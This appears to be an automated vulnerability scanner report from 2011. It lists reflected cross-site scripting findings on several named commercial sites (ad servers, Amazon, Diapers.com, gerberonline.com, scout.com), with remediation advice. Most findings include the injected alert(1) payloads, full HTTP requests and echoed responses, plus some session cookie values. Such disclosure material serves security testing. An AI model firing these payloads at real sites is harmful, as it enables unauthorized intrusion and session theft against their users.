Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload a6c4b<script>alert(1)</script>e9fbb5130ab was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the qry_lnk request parameter is copied into the HTML document as plain text between tags. The payload 7c385<script>alert(1)</script>7b7cdbc378 was submitted in the qry_lnk parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69616'-alert(1)-'9309e177aaf was submitted in the frameName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AdServer/AdServerServlet?operId=2&pubId=28489&siteId=28535&adId=24101&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags284892853524101559adtag_htmlkomli_ads_frame1284892853569616'-alert(1)-'9309e177aaf&kltstamp=2011-9-18%2020%3A25%3A35&ranreq=0.34278702503070235&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1716
Date: Wed, 19 Oct 2011 01:25:18 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Thu, 18-Oct-2012 01:25:18 GMT; path=/
Set-Cookie: pubfreq_28535_24101_1164556507=325-1; domain=pubmatic.com; expires=Wed, 19-Oct-2011 02:05:18 GMT; path=/
The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a74'-alert(1)-'95e5c0fb09c was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AdServer/AdServerServlet?operId=2&pubId=28489&siteId=28535&adId=24101&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html71a74'-alert(1)-'95e5c0fb09c&frameName=http_ads_pubmatic_comHostedDefaultTags284892853524101559adtag_htmlkomli_ads_frame12848928535&kltstamp=2011-9-18%2020%3A25%3A35&ranreq=0.34278702503070235&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1716
Date: Wed, 19 Oct 2011 01:25:16 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Thu, 18-Oct-2012 01:25:16 GMT; path=/
Set-Cookie: pubfreq_28535_24101_927002863=325-1; domain=pubmatic.com; expires=Wed, 19-Oct-2011 02:05:16 GMT; path=/
The value of the pmZoneId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8e2a'-alert(1)-'fe4cda61f05 was submitted in the pmZoneId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AdServer/AdServerServlet?operId=2&pubId=28489&siteId=28535&adId=24103&kadwidth=728&kadheight=90&pmZoneId=azfamily.com_728x90a8e2a'-alert(1)-'fe4cda61f05&kbgColor=ffffff&ktextColor=000000&klinkColor=002E64&pageURL=http://www.king5.com/&frameName=http_www_king5_comkomli_ads_frame12848928535&kltstamp=2011-9-18%2020%3A24%3A51&ranreq=0.4976927924435586&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=0x1062&adVisibility=3 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Accept: */*
Referer: http://www.king5.com/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Wed, 19 Oct 2011 01:24:50 GMT
Content-Length: 1904
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Thu, 18-Oct-2012 01:24:50 GMT; path=/
Set-Cookie: pubfreq_28535_24103_85091502=6-1; domain=pubmatic.com; expires=Wed, 19-Oct-2011 02:04:50 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Thu, 20-Oct-2011 01:24:50 GMT; path=/
The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87ae9'-alert(1)-'8adf6ed829a was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AdServer/AdServerServlet?operId=2&pubId=28489&siteId=28535&adId=24101&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags284892853524101559adtag_htmlkomli_ads_frame12848928535&kltstamp=2011-9-18%2020%3A25%3A35&ranreq=0.3427870250307023587ae9'-alert(1)-'8adf6ed829a&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Wed, 19 Oct 2011 01:25:22 GMT
Content-Length: 1716
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Thu, 18-Oct-2012 01:25:21 GMT; path=/
Set-Cookie: pubfreq_28535_24101_1653497370=325-1; domain=pubmatic.com; expires=Wed, 19-Oct-2011 02:05:22 GMT; path=/
The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca0cb"%3balert(1)//f7b7c0acb35 was submitted in the type parameter. This input was echoed as ca0cb";alert(1)//f7b7c0acb35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 103788
Content-Type: text/html; Charset=UTF-8
P3P: CP="NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE"
X-Powered-By: ASP.NET
Set-Cookie: tg_session_13746_195=; path=/; HttpOnly; Secure
Set-Cookie: tg_session=; path=/; HttpOnly; Secure
Set-Cookie: tg_session=^gemIFr0yz7Qk/HHmw74gmOHV4TH40VUWJZ/I3JlzEXeKVJGuRHbUCluD9BZg199tJ3OFxCKuO2Wf_C_R__L_F_mJO3FjLZoojSUEFO1YHbsP9BRGh0yXk=; path=/; HttpOnly; Secure
Set-Cookie: tg_session_13746_195=^gemIFr0yz7Qk/HHmw74gmOHV4TH40VUWJZ/I3JlzEXeKVJGuRHbUCluD9BZg199tJ3OFxCKuO2Wf_C_R__L_F_mJO3FjLZoojSUEFO1YHbsP9BRGh0yXk=; path=/; HttpOnly; Secure
Date: Fri, 14 Oct 2011 19:35:01 GMT
<SCRIPT LANGUAGE="javascript"> var MSG_DifferentLocaleSubmission= "You have selected jobs in different languages. Please limit your selection to one language at a time. \n\rAfter submitting, you ...[SNIP]... if (strLocale == lngSiteLocale) { openWindow11("/" + strLocale + "/asp/tg/GQLogin.asp?SID=^gemIFr0yz7Qk/HHmw74gmJV/30EMcKDpIpVG4JKSMUjokRpIU4jVBEjzlRm_slp_rhc_xgpw&fjd=true&referer=searchca0cb";alert(1)//f7b7c0acb35&gqid="+ arrGQIds[2] + "&jobinfo=__" + arrGQId[lngSelect-1] + "__&applycount=1&type=searchca0cb";alert(1)//f7b7c0acb35_jobdetail"); } else { document.frmMassApply.GQID.value = a ...[SNIP]...
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65e96"style%3d"x%3aexpression(alert(1))"896f6a37999 was submitted in the type parameter. This input was echoed as 65e96"style="x:expression(alert(1))"896f6a37999 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 103954
Content-Type: text/html; Charset=UTF-8
P3P: CP="NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE"
X-Powered-By: ASP.NET
Set-Cookie: tg_session_13746_195=; path=/; HttpOnly; Secure
Set-Cookie: tg_session=; path=/; HttpOnly; Secure
Set-Cookie: tg_session=^XAu7YJSy6wM15vti2Dcw/5igd0a1kbW2X1V72L2DqV6yY/1tGUDlWN/giRJyirf2cgxc6U5wJwlk_C_R__L_F_nZAUUZS5NumjSjPgpez1WPPVaNvztpA=; path=/; HttpOnly; Secure
Set-Cookie: tg_session_13746_195=^XAu7YJSy6wM15vti2Dcw/5igd0a1kbW2X1V72L2DqV6yY/1tGUDlWN/giRJyirf2cgxc6U5wJwlk_C_R__L_F_nZAUUZS5NumjSjPgpez1WPPVaNvztpA=; path=/; HttpOnly; Secure
Date: Fri, 14 Oct 2011 19:34:58 GMT
<SCRIPT LANGUAGE="javascript"> var MSG_DifferentLocaleSubmission= "You have selected jobs in different languages. Please limit your selection to one language at a time. \n\rAfter submitting, you ...[SNIP]... <form name="frmSearch" method="post" action="cim_searchresults.asp?ref=10142011153459&SID=^XAu7YJSy6wM15vti2Dcw/3QuMp84IEWJjuNIvWVftKW2AgflD5sjPb32hqpJWn2j&referer=search65e96"style="x:expression(alert(1))"896f6a37999"> ...[SNIP]...
1.9. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://syndication.mmismm.com
Path: /mmtnt.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f722b'%3balert(1)//753de77ed89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f722b';alert(1)//753de77ed89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8273"%3balert(1)//f5bb147caf8 was submitted in the p parameter. This input was echoed as d8273";alert(1)//f5bb147caf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Date: Wed, 19 Oct 2011 01:38:03 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: TAFE
Set-Cookie: tap=jdehhngEWQtABINNk9KlD_3duw0PAAEMAAAABQsAAQAAAAI5OQoAAwAAATMZ0_8xAAsAAQAAAAI3NQoAAwAAATMZ0_8xAAsAAQAAAAI3NAoAAwAAATMZ0_8xAAsAAQAAAAMxMDgKAAMAAAEzGdP_MQALAAEAAAADMTA1CgADAAABMxnT_zEAAA==; expires=Mon, 16-Apr-2012 01:38:03 GMT; Path=/; Domain=.tellapart.com
Connection: keep-alive
Content-Length: 4627
<html><body>
<script type="text/javascript">
// Maximum time allowed for pixels to load.
var MAX_PIXEL_LOAD_TIME = 3000;
// Ensures no more pixels are loaded after MAX_PIXEL_LOAD_TIME by removing src
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d4746<script>alert(1)</script>ef5cf2a010e was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 469a8<script>alert(1)</script>f5bea898fa2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the zip request parameter is copied into the HTML document as plain text between tags. The payload 17089<img%20src%3da%20onerror%3dalert(1)>487864721b767e161 was submitted in the zip parameter. This input was echoed as 17089<img src=a onerror=alert(1)>487864721b767e161 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK
Date: Wed, 19 Oct 2011 01:43:54 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=181-9895569-2816523; Domain=.amazon.com; Expires=Tue, 14-Oct-2031 01:43:54 GMT; Path=/
Content-Length: 1289
{"phoneBrowseNodeId":"/b/684177011","bundleBuildStates":[{"name":"SELECT_MBB_PLAN","url":"/b/2685640011"}],"didInternalBundleChangeOccur":false,"compatibilityResult":{"isCompatible":false,"compatibilityMessage":"This phone is not available in ZIP Code 1001017089<img src=a onerror=alert(1)>487864721b767e161","compatibilityLink":"<a href=\"/b/684177011/ref=bb_br_ph_dp\"> ...[SNIP]...
The value of the freetext request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1d07"-alert(1)-"c2642162bae was submitted in the freetext parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the freetext request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1717e"style%3d"x%3aexpression(alert(1))"77ce1a1b412 was submitted in the freetext parameter. This input was echoed as 1717e"style="x:expression(alert(1))"77ce1a1b412 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr ...[SNIP]... <meta name="description" content="Shop for lptakefive1717e"style="x:expression(alert(1))"77ce1a1b412 at Diapers.com. Free Shipping. Great Prices. Excellent Service." /> ...[SNIP]...
1.16. http://www.gerberonline.com/category.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.gerberonline.com
Path: /category.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 631d5"><script>alert(1)</script>671b8487751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category.aspx?catid=171&631d5"><script>alert(1)</script>671b8487751=1 HTTP/1.1
Host: www.gerberonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q='%22%3C%2Ftitle%3E%3Cscript+src%22+urchin.js'#q='%22%3C/title%3E%3Cscript+src%22+urchin.js'&hl=en&tbo=1&prmd=imvns&source=lnt&tbs=qdr:y&sa=X&ei=V5GYTsLDMsnciALzlP3JDQ&ved=0CA4QpwUoBQ&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=43b88dc4ecfc77e7&biw=1326&bih=890
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Fri, 14 Oct 2011 19:46:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 50796
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <a class="currentpage" href="category.aspx?pi=1&catid=171&631d5"><script>alert(1)</script>671b8487751=1"> ...[SNIP]...
The value of the cfg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 832ae'-alert(1)-'007bad23914 was submitted in the cfg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cfg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1f937(a)98c961d65a0 was submitted in the cfg parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:42:50 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 17:52:50 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2414
<!-- ERROR in function: "DB_Template_GET_BySiteAndPageType()" - Local date/time : Saturday, October 15, 2011 10:42:50 AM - Source : .Net SqlClient Data Provider - Message : Incorrect sy ...[SNIP]... <!-- v. 0.0.0.21898 Server Date: Saturday, October 15, 2011 10:42:50 AM URL: http://www.scout.com:80/Legacy/a.z?cfg=response.write(268409241-22)'1f937(a)98c961d65a0&conf=wac&fromprefetch=1&p=24&s=143 Server IP: 192.168.20.94, SCOUTWEB2 Page Execution Time: 5 ms --> ...[SNIP]...
The value of the conf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1dbbe(a)18e38db57dd was submitted in the conf parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:43:31 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 17:53:31 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2456
<!-- ERROR in function: "DB_Template_GET_BySiteAndPageType()" - Local date/time : Saturday, October 15, 2011 10:43:31 AM - Source : .Net SqlClient Data Provider - Message : Unclosed quo ...[SNIP]... <!-- v. 0.0.0.21898 Server Date: Saturday, October 15, 2011 10:43:31 AM URL: http://www.scout.com:80/Legacy/a.z?cfg=response.write(268409241-22)'&conf=wac1dbbe(a)18e38db57dd&fromprefetch=1&p=24&s=143 Server IP: 192.168.20.64, SODO Page Execution Time: 4 ms --> ...[SNIP]...
The value of the conf request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9aff4'-alert(1)-'1f9cfe2dea5 was submitted in the conf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fromprefetch request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13642'-alert(1)-'b9cae18ffb4 was submitted in the fromprefetch parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fromprefetch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c8f8(a)136ed51efa3 was submitted in the fromprefetch parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:44:26 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 17:54:26 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2471
<!-- ERROR in function: "DB_Template_GET_BySiteAndPageType()" - Local date/time : Saturday, October 15, 2011 10:44:26 AM - Source : .Net SqlClient Data Provider - Message : Unclosed quo ...[SNIP]... <!-- v. 0.0.0.21898 Server Date: Saturday, October 15, 2011 10:44:26 AM URL: http://www.scout.com:80/Legacy/a.z?cfg=response.write(268409241-22)'&conf=wac&fromprefetch=18c8f8(a)136ed51efa3&p=24&s=143 Server IP: 192.168.20.93, SCOUTWEB1 Page Execution Time: 5 ms --> ...[SNIP]...
1.23. http://www.scout.com/staticpages/www/24/wac/a.z [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.scout.com
Path: /staticpages/www/24/wac/a.z
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f1a7'-alert(1)-'a5336cd2117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:50:50 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 18:00:50 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2480

